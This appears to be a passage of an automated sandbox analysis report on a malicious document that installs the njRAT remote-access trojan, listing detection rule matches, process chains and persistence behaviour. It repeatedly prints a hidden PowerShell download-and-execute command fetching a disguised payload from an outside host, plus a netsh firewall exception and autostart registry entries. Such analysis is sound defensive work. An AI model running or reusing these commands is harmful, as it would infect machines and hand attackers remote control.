Source: 11.2.dllhost.exe.210000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 10.0.exploit.exe.1d0000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c_RID2E71 date = 2018-02-08 11:14:41, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
Source: 10.0.exploit.exe.1d0000.0.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 10.0.exploit.exe.1d0000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 16.2.dllhost.exe.210000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c_RID2E71 date = 2018-02-08 11:14:41, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
Source: 16.2.dllhost.exe.210000.0.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 16.2.dllhost.exe.210000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 15.2.dllhost.exe.210000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c_RID2E71 date = 2018-02-08 11:14:41, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
Source: 15.2.dllhost.exe.210000.0.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 15.2.dllhost.exe.210000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net

Classification label

Show sources

Source: classification engine

Classification label: mal100.troj.adwa.spyw.expl.evad.winODT@19/16@43/1

Contains functionality to adjust token privileges (e.g. debug / backup)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_004CACEE AdjustTokenPrivileges,	9_2_004CACEE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_004CACB7 AdjustTokenPrivileges,	9_2_004CACB7
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Code function: 11_2_005B14E6 AdjustTokenPrivileges,	11_2_005B14E6
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Code function: 11_2_005B14AF AdjustTokenPrivileges,	11_2_005B14AF

Creates files inside the user directory

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$toformLiscence bls activation.odt

Jump to behavior

Creates temporary files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRBBF3.tmp

Jump to behavior

Parts of this applications are using the .NET runtime (Probably coded in C#)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Queries process information (via WMI, Win32_Process)

Show sources

Source: C:\Windows\System32\mshta.exe

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Reads ini files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Show sources

Source: C:\Windows\System32\verclsid.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Sample is known by Antivirus

Show sources

Source: AutoformLiscence bls activation.odt

Virustotal: Detection: 28%

Sample might require command line arguments

Show sources

Source: powershell.exe	String found in binary or memory: The device has succeeded a query-stop and its resource requirements have changed.
Source: powershell.exe	String found in binary or memory: The device's co-installer has additional work to perform after installation is complete.
Source: powershell.exe	String found in binary or memory: The device's co-installer is invalid.
Source: powershell.exe	String found in binary or memory: The components threading model has changed after install into a COM+ Application. Please re-install component.

Spawns processes

Show sources

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Source: unknown	Process created: C:\Windows\System32\verclsid.exe 'C:\Windows\system32\verclsid.exe' /S /C {3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'C:\Users\user\AppData\Local\Temp\Exploit (2).hta'
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c PowerShell.exe -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://1.top4top.net/p_1301n6ked1.jpg','%temp%\exploit.exe');Start-Process '%temp%\exploit.exe'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell.exe -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://1.top4top.net/p_1301n6ked1.jpg','C:\Users\user\AppData\Local\Temp\exploit.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\exploit.exe'
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\exploit.exe 'C:\Users\user\AppData\Local\Temp\exploit.exe'
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\dllhost.exe 'C:\Users\user\AppData\Local\Temp\dllhost.exe'
Source: unknown	Process created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram 'C:\Users\user\AppData\Local\Temp\dllhost.exe' 'dllhost.exe' ENABLE
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\dllhost.exe 'C:\Users\user\AppData\Local\Temp\dllhost.exe' ..
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\dllhost.exe 'C:\Users\user\AppData\Local\Temp\dllhost.exe' ..
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\verclsid.exe 'C:\Windows\system32\verclsid.exe' /S /C {3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'C:\Users\user\AppData\Local\Temp\Exploit (2).hta'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell.exe -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://1.top4top.net/p_1301n6ked1.jpg','C:\Users\user\AppData\Local\Temp\exploit.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\exploit.exe'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\exploit.exe 'C:\Users\user\AppData\Local\Temp\exploit.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\exploit.exe	Process created: C:\Users\user\AppData\Local\Temp\dllhost.exe 'C:\Users\user\AppData\Local\Temp\dllhost.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Process created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram 'C:\Users\user\AppData\Local\Temp\dllhost.exe' 'dllhost.exe' ENABLE	Jump to behavior

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Reads internet explorer settings

Show sources

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Found graphical window changes (likely an installer)

Show sources

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Checks if Microsoft Office is installed

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Show sources

Source:

Binary string: D:\office\Target\word\x86\ship\0\msword.PDB source: WINWORD.EXE, 00000000.00000002.738392363.04610000.00000002.00000001.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: exploit.exe.9.dr, OK.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: dllhost.exe.10.dr, OK.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 10.2.exploit.exe.1d0000.0.unpack, OK.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 10.0.exploit.exe.1d0000.0.unpack, OK.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: bde52a20d668d6f304b9db902c7cfc6b.exe.11.dr, OK.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 11.0.dllhost.exe.210000.0.unpack, OK.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 11.2.dllhost.exe.210000.0.unpack, OK.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 15.0.dllhost.exe.210000.0.unpack, OK.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 15.2.dllhost.exe.210000.0.unpack, OK.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 16.0.dllhost.exe.210000.0.unpack, OK.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 16.2.dllhost.exe.210000.0.unpack, OK.cs	.Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Suspicious powershell command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell.exe -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://1.top4top.net/p_1301n6ked1.jpg','C:\Users\user\AppData\Local\Temp\exploit.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\exploit.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell.exe -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://1.top4top.net/p_1301n6ked1.jpg','C:\Users\user\AppData\Local\Temp\exploit.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\exploit.exe'			Jump to behavior

Uses code obfuscation techniques (call, push, ret)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_045C03BC push eax; mov dword ptr [esp], ecx	9_2_045C03D4
Source: C:\Users\user\AppData\Local\Temp\exploit.exe	Code function: 10_2_001D5021 push cs; ret	10_2_001D5022
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Code function: 11_2_00215021 push cs; ret	11_2_00215022

Persistence and Installation Behavior:

Creates processes via WMI

Show sources

Source: C:\Windows\System32\mshta.exe

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Tries to download and execute files (via powershell)

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell.exe -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://1.top4top.net/p_1301n6ked1.jpg','C:\Users\user\AppData\Local\Temp\exploit.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\exploit.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell.exe -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://1.top4top.net/p_1301n6ked1.jpg','C:\Users\user\AppData\Local\Temp\exploit.exe');Start-Process 'C:\Users\user\AppData\Local\Temp\exploit.exe'			Jump to behavior

Drops PE files

Show sources

Source: C:\Users\user\AppData\Local\Temp\exploit.exe	File created: C:\Users\user\AppData\Local\Temp\dllhost.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bde52a20d668d6f304b9db902c7cfc6b.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\exploit.exe	Jump to dropped file

Boot Survival:

Creates autostart registry keys with suspicious names

Show sources

Source: C:\Users\user\AppData\Local\Temp\dllhost.exe

Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bde52a20d668d6f304b9db902c7cfc6b

Jump to behavior

Drops PE files to the startup folder

Show sources

Source: C:\Users\user\AppData\Local\Temp\dllhost.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bde52a20d668d6f304b9db902c7cfc6b.exe

Jump to dropped file

Creates a start menu entry (Start Menu\Programs\Startup)

Show sources

Source: C:\Users\user\AppData\Local\Temp\dllhost.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bde52a20d668d6f304b9db902c7cfc6b.exe

Jump to behavior

Stores files to the Windows start menu directory

Show sources

Source: C:\Users\user\AppData\Local\Temp\dllhost.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bde52a20d668d6f304b9db902c7cfc6b.exe

Jump to behavior

Creates an autostart registry key

Show sources

Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run bde52a20d668d6f304b9db902c7cfc6b	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run bde52a20d668d6f304b9db902c7cfc6b	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bde52a20d668d6f304b9db902c7cfc6b	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dllhost.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bde52a20d668d6f304b9db902c7cfc6b	Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\verclsid.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
